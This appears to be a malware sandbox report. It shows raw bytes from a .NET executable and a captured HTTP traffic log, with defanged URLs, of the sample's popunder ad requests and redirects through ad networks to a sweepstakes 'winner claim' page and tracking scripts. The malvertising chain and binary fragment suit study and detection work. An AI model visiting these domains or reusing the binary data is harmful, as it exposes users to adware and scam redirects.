.. ..`.rsrc........`.......B..............@[email protected].......`.......:..
[email protected]................\^......H.......@"...9..........8\....
...........................................0..6.......~..........%..|.
o.................(....(.......&...*.*..........//.......0...........(
......(.....o....s..... o.....s....%.o....%.o.....(.....o....o......s.
.......s......i.).....%......io.......o ...o ...(!........o"...r...p(#
...o$...*..-.r...ps%...z.(&...o'...%-.r3..ps%...z.......%...o(...&*.rQ
..p.....*....0.. ..........X..X...()...&(..........~....(......&..*...
......''........(*...*.~....-.r. .p.....( ...o,...s-........~....*.~..
..*.......*.~....*..(....*Vs....(/...t.........*BSJB............v2.0.5
0727......l.......#~..H...$...#Strings....l.... ..#US.<7......#GUID
...L7......#Blob...........W..........3........0.................../..
......................................."...........................(..
.........o.....P...................................~.....3...........)
.............#...P.......c.........c.....S.....>.....;.s.....s.....
....J....._...........9.....W.....^.....T.........................
<<< skipped >>>

GET /apu.php?n=&zoneid=14335&cb=INSERT_RANDOM_NUMBER_HERE&popunder=1&direct=1 HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.xmediaserve.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.8.0

Date: Sat, 15 Oct 2016 06:08:09 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Content-Encoding: gzip

Set-Cookie: DS=lpWmH3VcW2309|WAHHo|WAHHo; path=/
20f.............S]S.0.}.W.>.ftZ>\.....*.....>1%..h..4mA..oKa.
..q.r.{o..9........wG.d..J...KZ%%[.....e..d...f.8Yf?DX.P*r...JXH..M.".
... ...<.V...aI9.]..@..))e...VD....;.\#.g.....j..^C....I.q..:......
.B8..`...s....f.....X.J4"....mo%....u..{:..C....L.Z...x[.t}k.e...%.[.v
r....!.g`.f.cW~w.%..U*H...;@.......=..V..7.r.C.J]U.! .....gNY.*.UI....
.>.F..:.o...vX...A..t...w..=.v...^........7~\..1.....jn...G.Q...AW=
)[email protected]..<0.0....^0[{..(.........n.......~{p7.O..9.i..9Z....
.vU#T..vUU..#-!QB.}.}....d...A.!3......2...F......._.2T.......0..HTTP/
1.1 200 OK..Server: nginx/1.8.0..Date: Sat, 15 Oct 2016 06:08:09 GMT..
Content-Type: text/html..Transfer-Encoding: chunked..Content-Encoding:
 gzip..Set-Cookie: DS=lpWmH3VcW2309|WAHHo|WAHHo; path=/..20f..........
...S]S.0.}.W.>.ftZ>\.....*.....>1%..h..4mA..oKa...q.r.{o..9..
......wG.d..J...KZ%%[.....e..d...f.8Yf?DX.P*r...JXH..M.".... ...<.V
...aI9.]..@..))e...VD....;.\#.g.....j..^C....I.q..:.......B8..`...s...
.f.....X.J4"....mo%....u..{:..C....L.Z...x[.t}k.e...%.[.vr....!.g`.f.c
W~w.%..U*H...;@.......=..V..7.r.C.J]U.! .....gNY.*.UI.....>.F..:.o.
..vX...A..t...w..=.v...^........7~\..1.....jn...G.Q...AW=).s.L..X.@...
H..<0.0....^0[{..(.........n.......~{p7.O..9.i..9Z.....vU#T..vUU..#
-!QB.}.}....d...A.!3......2...F......._.2T.......0......


GET /apu2.php?n=&zoneid=14335&cb=INSERT_RANDOM_NUMBER_HERE&popunder=1&direct=1&vdsvdi=8VRkQKTXyGgciKcbxKSwmKowHFXzq1yUd0DvQ74Wn62IqQlLOnkLQ2Ag8evEGIE3 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.xmediaserve.com

Connection: Keep-Alive

Cookie: DS=lpWmH3VcW2309|WAHHo|WAHHo

HTTP/1.1 302 Found

Server: nginx/1.8.0

Date: Sat, 15 Oct 2016 06:08:10 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Pragma: no-cache

Cache-Control: private, max-age=0, no-cache

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Set-Cookie: OAGEO=UA|07|Kharkiv||49.9808|36.2527|||Pitline Ltd|Pitline Ltd|; path=/; domain=.xmediaserve.com

Set-Cookie: OAID=695046c3b6014e7f28b7cdc4c3702640; expires=Sun, 15-Oct-2017 06:08:10 GMT; Max-Age=31536000; path=/; domain=.xmediaserve.com

P3P: CP="CUR ADM OUR NOR STA NID"

Set-Cookie: _OXLIA[501309]=of2rpm-14335; expires=Mon, 14-Nov-2016 06:08:10 GMT; Max-Age=2592000; path=/; domain=.xmediaserve.com

Set-Cookie: _OXLCA[501309]=of2rpm-14335; expires=Mon, 14-Nov-2016 06:08:10 GMT; Max-Age=2592000; path=/; domain=.xmediaserve.com

Location: hXXp://engine.phn.doublepimp.com/link.engine?guid=acdcc8ca-2da5-40a4-be1c-c1355bb0eac0&Hardlink=true&time=0&SubID=14335&tid=as3a69f752f41747b8e938f36478162c9e&dp=3270664418.501309.78515570f2.14335.3a69f752f41747b8e938f36478162c9e
0..HTTP/1.1 302 Found..Server: nginx/1.8.0..Date: Sat, 15 Oct 2016 06:
08:10 GMT..Content-Type: text/html; charset=UTF-8..Transfer-Encoding: 
chunked..Pragma: no-cache..Cache-Control: private, max-age=0, no-cache
..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Set-Cookie: OAGEO=UA|07|
Kharkiv||49.9808|36.2527|||Pitline Ltd|Pitline Ltd|; p
ath=/; domain=.xmediaserve.com..Set-Cookie: OAID=695046c3b6014e7f28b7c
dc4c3702640; expires=Sun, 15-Oct-2017 06:08:10 GMT; Max-Age=31536000; 
path=/; domain=.xmediaserve.com..P3P: CP="CUR ADM OUR NOR STA NID"..Se
t-Cookie: _OXLIA[501309]=of2rpm-14335; expires=Mon, 14-Nov-2016 06:08:
10 GMT; Max-Age=2592000; path=/; domain=.xmediaserve.com..Set-Cookie: 
_OXLCA[501309]=of2rpm-14335; expires=Mon, 14-Nov-2016 06:08:10 GMT; Ma
x-Age=2592000; path=/; domain=.xmediaserve.com..Location: hXXp://engin
e.phn.doublepimp.com/link.engine?guid=acdcc8ca-2da5-40a4-be1c-c1355bb0
eac0&Hardlink=true&time=0&SubID=14335&tid=as3a69f752f41747b8e938f36478
162c9e&dp=3270664418.501309.78515570f2.14335.3a69f752f41747b8e938f3647
8162c9e..0..
<<< skipped >>>

GET /?kw=14335&s1=3270664418.497271.63a7f377f8.14335.2e6c1690aa2e2344ccce41cfc15da3b5&s2=pc HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Connection: Keep-Alive

Host: tah.originalcleanbrands.com

HTTP/1.1 302 Found

Server: nginx/1.6.3

Date: Sat, 15 Oct 2016 06:08:10 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

X-Powered-By: PHP/7.0.4

Location: hXXp://OVuzz.win-land.0698.ws/?sov=5388363&hid=eoewomqgokemi&&redid=7931&gsid=68&campaign_id=106&id=XNSX.3270664418.497271.63a7f377f8.14335.2e6c1690aa2e2344ccce41cfc15da3b5::pc-r7931-t68&impid=bfe8920c-929d-11e6-8baf-aa1f778d2780
0..HTTP/1.1 302 Found..Server: nginx/1.6.3..Date: Sat, 15 Oct 2016 06:
08:10 GMT..Content-Type: text/html; charset=UTF-8..Transfer-Encoding: 
chunked..X-Powered-By: PHP/7.0.4..Location: hXXp://OVuzz.win-land.0698
.ws/?sov=5388363&hid=eoewomqgokemi&&redid=7931&gsid=68&campaign_id=106
&id=XNSX.3270664418.497271.63a7f377f8.14335.2e6c1690aa2e2344ccce41cfc1
5da3b5::pc-r7931-t68&impid=bfe8920c-929d-11e6-8baf-aa1f778d2780..0
..

GET /analytics.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.freelotto.com/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.google-analytics.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Strict-Transport-Security: max-age=10886400; includeSubDomains; preload

Date: Sat, 15 Oct 2016 06:05:26 GMT

Expires: Sat, 15 Oct 2016 08:05:26 GMT

Last-Modified: Wed, 28 Sep 2016 20:19:01 GMT

X-Content-Type-Options: nosniff

Content-Type: text/javascript

Vary: Accept-Encoding

Content-Encoding: gzip

Server: Golfe2

Content-Length: 11590

Age: 168

Cache-Control: public, max-age=7200
...........}iw..........tc.m'.a.i|B...F6 ...%.6.F.....o..JR/..{.....s'
V..VK..J.W..Hz...=....S....=$......l.j.......d....?Q...-..K...j(FR..W]
.b._..V.Ea-.6u.......D..gF.....[.<..W...../............`z.....g.l..
~.............>..........GB..N....?...?.I2.....U...o<.....W.;...
x qq......J.......zC.q...?.<.....P.."..[.|.....\P.c...[8.......FB;/
..#..N.........,.:..}.mw.....Bx..?...r=&`..,Q....)j.v..f3.._.y....<
.}..........y.5..l...fk..E.B7].X....%. h...6m...J$O.......!=.P,..$qo..
...]]..8g?....f..Oj......M..b4.$.T$...{...R..^......_.63T-.e..#h7Y.F..
~..}..Q....\..Z.2KKO...on8..%.!.n.."V<Qo.j......0. .o{2..u(uU..M.8.
E..FDs6.y.....7..\..g.....x4.7<.......yg.{f.....>.k/s..V..k....)
....s)..@...$QC.7..\.P*I..uI.E.........U..7.<.]Wy.0.....]..........
..*.2.[.0 @e.1....qXT._... .!8..IO..........L%..}.6.%.u6'"...."*.>.
........[.U]..O.k.p.........C'QwI......*..~([email protected]
..........<[email protected]..=.y.1..M....D...G..P..O..s.v)/[.....
q.......e.s*.aE3"p[..J.[Xj<}.....u...^^.=.....u.....V....sR....Z...
...Uo....P\........M.!,L..v...[....'.hBd.n.....rr....c..@=.o.N..|A....
C..-.D...ju....E.t....s.......p$.7.HT....S...!.4....]./.X.......C.C.[.
X....~..B.d.../.e.4..O.r*q`.....d.....b...t........../^6.jg:B........'
....x4...w;D...J1.._`.@].s...'*U....&.a.KFD....<[email protected].?U..a...P
..J.V..\%...O'].Q...[.7....Fn...0tgA.2S.#-....._..%....q......f..9...z
Z...l==.R [email protected]...."......[.....".".;..YBf....~.....m.$....d42?.9f..K@
........7.Q_..w.<-...;z..|..*..>...D...(?r.....@F.. ..P]...2
<<< skipped >>>

GET /r/collect?v=1&_v=j47&a=896694813&t=pageview&_s=1&dl=http://VVV.freelotto.com/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV&ul=en-us&de=utf-8&dt=CERTIFIED WINNER CLAIM FORM&sd=32-bit&sr=1916x902&vp=1896x749&je=0&fl=11.6 r602&_u=AEAAAAAAI~&jid=288336700&cid=1534724702.1476511708&tid=UA-2349802-17&_r=1&z=161937165 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.freelotto.com/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.google-analytics.com

Connection: Keep-Alive

HTTP/1.1 302 Found

Location: hXXps://stats.g.doubleclick.net/r/collect?v=1&aip=1&t=dc&_r=3&tid=UA-2349802-17&cid=1534724702.1476511708&jid=288336700&_v=j47&z=161937165

Access-Control-Allow-Origin: *

Date: Sat, 15 Oct 2016 06:08:15 GMT

Pragma: no-cache

Expires: Fri, 01 Jan 1990 00:00:00 GMT

Cache-Control: no-cache, no-store, must-revalidate

Last-Modified: Sun, 17 May 1998 03:00:00 GMT

Content-Type: text/html; charset=UTF-8

Server: Golfe2

Content-Length: 367
<HTML><HEAD><meta http-equiv="content-type" content="te
xt/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HE
AD><BODY>.<H1>302 Moved</H1>.The document has mov
ed.<A HREF="hXXps://stats.g.doubleclick.net/r/collect?v=1&aip=1
&t=dc&_r=3&tid=UA-2349802-17&cid=1534724702.1476511708
&jid=288336700&_v=j47&z=161937165">here</A>...<
;/BODY></HTML>..HTTP/1.1 302 Found..Location: hXXps://stats.g
.doubleclick.net/r/collect?v=1&aip=1&t=dc&_r=3&tid=UA-2349802-17&cid=1
534724702.1476511708&jid=288336700&_v=j47&z=161937165..Access-Control-
Allow-Origin: *..Date: Sat, 15 Oct 2016 06:08:15 GMT..Pragma: no-cache
..Expires: Fri, 01 Jan 1990 00:00:00 GMT..Cache-Control: no-cache, no-
store, must-revalidate..Last-Modified: Sun, 17 May 1998 03:00:00 GMT..
Content-Type: text/html; charset=UTF-8..Server: Golfe2..Content-Length
: 367..<HTML><HEAD><meta http-equiv="content-type" cont
ent="text/html;charset=utf-8">.<TITLE>302 Moved</TITLE>
</HEAD><BODY>.<H1>302 Moved</H1>.The document 
has moved.<A HREF="hXXps://stats.g.doubleclick.net/r/collect?v=1&am
p;aip=1&t=dc&_r=3&tid=UA-2349802-17&cid=1534724702.147
6511708&jid=288336700&_v=j47&z=161937165">here</A>
;...</BODY></HTML>....
<<< skipped >>>

GET /dc.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.freelotto.com/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: stats.g.doubleclick.net

Connection: Keep-Alive

HTTP/1.1 200 OK

Strict-Transport-Security: max-age=10886400; includeSubDomains; preload

Date: Sat, 15 Oct 2016 04:25:43 GMT

Expires: Sat, 15 Oct 2016 06:25:43 GMT

Last-Modified: Wed, 28 Sep 2016 20:19:01 GMT

X-Content-Type-Options: nosniff

Content-Type: text/javascript

Vary: Accept-Encoding

Content-Encoding: gzip

Server: Golfe2

Content-Length: 15977

Age: 6151

Cache-Control: public, max-age=7200
...........}kW....w~........pk..f......Z.R..Y.C 8i.pi......b..}.>g.
.Kl...}4....d....O...-.....`~...E...]7..>..>....Pf.a.yU."HCC...i
...T*..b.....'..Olf[.Y.[c6P/.....'n.m'..m.... !_XXll..&..(..E..V=/.u.X
..%.w...i..rDoT.....?>z..1`.D...y...y7. \...5ZI...TA..........C...p
3..A..x.k.q4.2...?L.k=.v....4.:sB[...l.w.o {.....?Nc....|..........q..
.......[.n..2..X~.......S.f.]h~....7:.n...m.C#6...........#....y...7.|
..f.W.>..wS......)..Q....i......z......D.`...7N....y.C;....`1....x.
.p.tG.L..=..1r...M..2..)xa...{0!..5...^...7..."..........J8... ...5.O.
...l...r...|....R...P.0ok.8.Z.2....i|...S.y.od...~..k.>.....0vGr.mI
.....0.&&yg.sf2......m.....G=0..B.6..u....A.h.A.0.V.:.-...j..L.....5.E
.[...Q.{2imA......T........~. ...0*%.....>......hX...ga1./$......f.
#..d,.|www5/XX...c5..D-.....p.h..8D.@./.X,.....&gTV..5..,.x..?.....(.&
gt;?6Sy.].`.]...'-"....-...........(.n.@_"p"`.*...T.1.$..t.....o?.."..
/.kX.)[email protected].,HP........# ....d...-,.......-.j..B
S....9...%.~Sug,...`."[email protected]]..yn.i(5.....U.r..$j..0{|.i.5........
H}.......A=..&.Vq....4<..*7c.<b.....OQ8X...&..a/a.....aI.j.7.E.:
cuV=.P.q..d.....X....#[email protected][email protected].#....Q.....K.....
.A.y._....z|..9...9.zM......%m........m).?4.Q...c.....PTDB&..7.-G....E
.....E.7.t.V..G....._..!.....xt..}.......Ev..x..a.{...d.. .q./..OB|.
.6..{....a^.......@?.......o.....*T.;/Oa.......J..........I.)......J..
#..A....FS.....t.H..h...W..|B.~..t.6..........t"<..z..||.......8..B
9......x.a....m.V[.=...K!..\.....w."d...=>.B..(K...u.....~.".@b
<<< skipped >>>

GET /r/__utm.gif?utmwv=5.6.7dc&utms=1&utmn=995184914&utmhn=VVV.freelotto.com&utmcs=utf-8&utmsr=1916x902&utmvp=1896x749&utmsc=32-bit&utmul=en-us&utmje=1&utmfl=11.6 r602&utmdt=CERTIFIED WINNER CLAIM FORM&utmhid=896694813&utmr=-&utmp=/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV&utmht=1476511708672&utmac=UA-2349802-18&utmcc=__utma=30605800.1534724702.1476511708.1476511709.1476511709.1;+__utmz=30605800.1476511709.1.1.utmcsr=YTZ|utmccn=EveryoneWinsTV|utmcmd=Display|utmctr=CPA|utmcct=CertifiedWinnerRSP;&utmjid=2008461925&utmredir=3&utmu=qBAAAAAAAAAAAAAAAAABAAAE~ HTTP/1.1

Accept: */*

Referer: hXXp://VVV.freelotto.com/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: stats.g.doubleclick.net

Connection: Keep-Alive

HTTP/1.1 200 OK

Access-Control-Allow-Origin: *

Strict-Transport-Security: max-age=10886400; includeSubDomains; preload

Date: Sat, 15 Oct 2016 06:08:15 GMT

Pragma: no-cache

Expires: Fri, 01 Jan 1990 00:00:00 GMT

Cache-Control: no-cache, no-store, must-revalidate

Last-Modified: Sun, 17 May 1998 03:00:00 GMT

X-Content-Type-Options: nosniff

Content-Type: image/gif

Server: Golfe2

Content-Length: 35
GIF89a.............,...........D..;HTTP/1.1 200 OK..Access-Control-All
ow-Origin: *..Strict-Transport-Security: max-age=10886400; includeSubD
omains; preload..Date: Sat, 15 Oct 2016 06:08:15 GMT..Pragma: no-cache
..Expires: Fri, 01 Jan 1990 00:00:00 GMT..Cache-Control: no-cache, no-
store, must-revalidate..Last-Modified: Sun, 17 May 1998 03:00:00 GMT..
X-Content-Type-Options: nosniff..Content-Type: image/gif..Server: Golf
e2..Content-Length: 35..GIF89a.............,...........D..;..

GET /pagead/conversion.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.freelotto.com/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.googleadservices.com

Connection: Keep-Alive

HTTP/1.1 200 OK

P3P: policyref="hXXp://VVV.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"

Content-Type: text/javascript; charset=UTF-8

ETag: 4478126127354210007

Date: Sat, 15 Oct 2016 06:08:17 GMT

Expires: Sat, 15 Oct 2016 06:08:17 GMT

Cache-Control: private, max-age=86400

X-Content-Type-Options: nosniff

Content-Disposition: attachment; filename="f.txt"

Content-Encoding: gzip

Server: cafe

Content-Length: 5368

X-XSS-Protection: 1; mode=block
...........[is.F..._A")..!..lgCh..l..m..-{.P\....0.0..."..>=......-
.@`........./.n.Fs....qc..q..SV.s....2.kI...@c,.]..o..MM8......w...w|%
...0I.\...E:H.f...*M.;.......Es.MLUg....].I.LE.g.C.......E,......~....
...[.....Wj.N...s.S.Zqk...)......j.]...............d...<.Z.......k.
5.VK..=B.V .p.._..c......\w.C.5{6...ML....4...j..k.L.9.LL.*"D.n..... .
.g.v.X.. .)....g.R4........V..Rc..=...cz..O.4..!..<N..i.S|. .&'....
U..cg.....$..,.....j.g...ay..8..'...........4.....>..hR.Y*....4"...
=......5....V.b1...;..^$.7.;j....;..i.........3.....3...jr.g/...V..Ban
N...:g\. .\>.f......./.S.\,k...|.......krk*.A:n.F..!:...ec..j.z.9..
,H.!.......(.m. .c....6n#..!.Cw.. g.f{..[......i.....W.....'...C...G..
.f.h..T......>7'.kO.<{.&2...J.f,.NFP"..k.....B........u6R.6.....
.`........$..30.....Z....Z@...... .....0.B91.)....F.Fs..._,...V...`9..
H2.r}.r.....O..'..p...,.z...J.76....ll..U..4.I.o.....Z&"~.._*.a.......
>..\.0MS.^l...Pkh..}.)ReU3...m;.l.....w........z.).."No..'...C.= .S
\#.v{MvSh.v.F...h..K......l.|....-..x.{......o.;.4.sSW5i.!...K...(..g$
.]..{. ...(..e.........m. .i."W.c......c...U.z.x.c{'.......}f7$X/3....
....?..=j.......%n.K.....)ix..}x.]X...:....}...Z.W....=.....7...Sp....
9*h.....L..6.:..&..`[email protected]..&..do[.........8...[...c.z.
C...cs.....}C...ZTY...9...K...;.....M....Y#X....Jz.......sj...a.......
.#..p.^.j{.]..../[email protected].....=J,".....lX...'..!W.v.."...p.r..
..Q.....l[K2.H0...^N.Z.....M*4....4..~...p*..Sx...s.@>....X.....c.u
4....i/?....f.."....A..r.b..h..gF.....-SS?a..0.G..>..Svd......r
<<< skipped >>>

GET /compliance/seal_js.php?code=573aebfa59bfcc15516aa10a75f09b9b&style=normal&size=105x54&language=en HTTP/1.1

Accept: */*

Referer: hXXp://VVV.freelotto.com/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: sealserver.trustkeeper.net

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Apache

X-Powered-By: PHP/5.1.6

Content-Length: 804

Content-Type: text/javascript

Date: Sat, 15 Oct 2016 06:08:14 GMT

Connection: keep-alive
<!--..document.write("<img id=\"trustwaveSealImage\" src=\"http:
//sealserver.trustkeeper.net/seal_image.php?customerId=573aebfa59bfcc1
5516aa10a75f09b9b&size=105x54&style=normal\" border=\"0\" style=\"curs
or:pointer;\" onclick=\"javascript:window.open('hXXp://sealserver.trus
tkeeper.net/cert.php?customerId=573aebfa59bfcc15516aa10a75f09b9b&size=
105x54&style=normal', 'c_TW', 'location=no, toolbar=no, resizable=yes,
 scrollbars=yes, directories=no, status=no, width=615, height=720'); r
eturn false;\" oncontextmenu=\"javascript:alert('Copying Prohibited by
 Law - Trusted Commerce is a Service Mark of TrustWave Holdings, Inc.'
); return false;\" alt=\"This site is protected by Trustwave's Trusted
 Commerce program\" title=\"This site is protected by Trustwave's Trus
ted Commerce program\" />");..// -->..HTTP/1.1 200 OK..Server: A
pache..X-Powered-By: PHP/5.1.6..Content-Length: 804..Content-Type: tex
t/javascript..Date: Sat, 15 Oct 2016 06:08:14 GMT..Connection: keep-al
ive..<!--..document.write("<img id=\"trustwaveSealImage\" src=\"
hXXp://sealserver.trustkeeper.net/seal_image.php?customerId=573aebfa59
bfcc15516aa10a75f09b9b&size=105x54&style=normal\" border=\"0\" style=\
"cursor:pointer;\" onclick=\"javascript:window.open('hXXp://sealserver
.trustkeeper.net/cert.php?customerId=573aebfa59bfcc15516aa10a75f09b9b&
size=105x54&style=normal', 'c_TW', 'location=no, toolbar=no, resizable
=yes, scrollbars=yes, directories=no, status=no, width=615, height=720
'); return false;\" oncontextmenu=\"javascript:alert('Copying Proh
<<< skipped >>>

GET /seal_image.php?customerId=573aebfa59bfcc15516aa10a75f09b9b&size=105x54&style=normal HTTP/1.1

Accept: */*

Referer: hXXp://VVV.freelotto.com/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: sealserver.trustkeeper.net

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Apache

X-Powered-By: PHP/5.1.6

Content-Length: 3018

Content-Type: image/png

Date: Sat, 15 Oct 2016 06:08:15 GMT

Connection: keep-alive
.PNG........IHDR...i...5.....u.5.....PLTE...Z[\jjjZW\ZT^ZZZZZ]WXZWW[Z[
]UUUZ[[YY\ZW^Z\]`aaWX]XX\R.GXqXM.CQ.GO.EK.@J.>L.BP.FG.=S.IXpXd.[...
\.RZW^t.l..._.VC.9k.c...n.f............}.u.....z...Q.GU.Ki.`......S.I.
........?.4......R.GYhZU.OYd[...W.N:./f.]...XuWR.Ip.pXrX..............
................3.....j.a...n.g&.....*....................Q........Z[]
............>.....c.Z............E........[..............r.j8......
...........}.w............$..............h._I..z..f.....m..... ....._.
....t.ma.X......].T...c..L..............k....."...........-..r........
...........}..{......W..B..w.o...0..............5.....z.r......Z.Pu...
..2..rruddeY.P...(..}}.n.e.........||.S.E......Q.G............~||O..U.
....^.I...........................R.H.........J....tRNS.....>......
......5.*)....IDATx......0...t..U..t...N..r..^q..).<Lb...0...s....E
..j.G..m.L.NK^.A.....fz.$.ov..G.4..xc'.~..?3.....d.K.w.....H...V/k=aY.
d...RVVV........>........m...3..I...h.P....T.}zb.j...1oW......_:u..
.D.".H....:...A.\.....]"..n........Q...).._(q..u....qzjMl...tc.q...q3.
...).7....M..i>..,[email protected]%....,W..]A%7j:7*...
......!..k.i3.nh.,.Gs9]..).'.....b....x.........rQ.Z./L.Q..,q_.....v.=
...............R..F[..V.ty....Z.Pq.."r."U...de..X..B.....%.z.qs.d.#"/V
v.5K...RdaY....Hw..p<.v.$El!.%.......j..zP..M.KUf.1.....8..{...|.t.
.6).Z....Yrx.|...r..[.jIn1*A..i..155.p.k.;.%w.dE...'j...Vbs.*r........
...~...}%.....t]..s....mv.M...T....&.E..cb....p. n3..`..?.u9._..T..-..
B.r.....1C.d..|F.Ei..3..&...]..KV..*.......V.,rZ..W.D.-S3.,.`fv..t
<<< skipped >>>

GET /spx?dxver=4.0.0&shaid=12563&tdr=&plh=http://VVV.freelotto.com/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV&cb=92883198028657800 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.freelotto.com/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: dx.steelhousemedia.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Encoding: gzip

Expires: Thu, 01 Jan 1970 00:00:00 GMT

Content-Type: application/javascript;charset=utf-8

Date: Sat, 15 Oct 2016 06:08:17 GMT

Connection: close

Transfer-Encoding: chunked
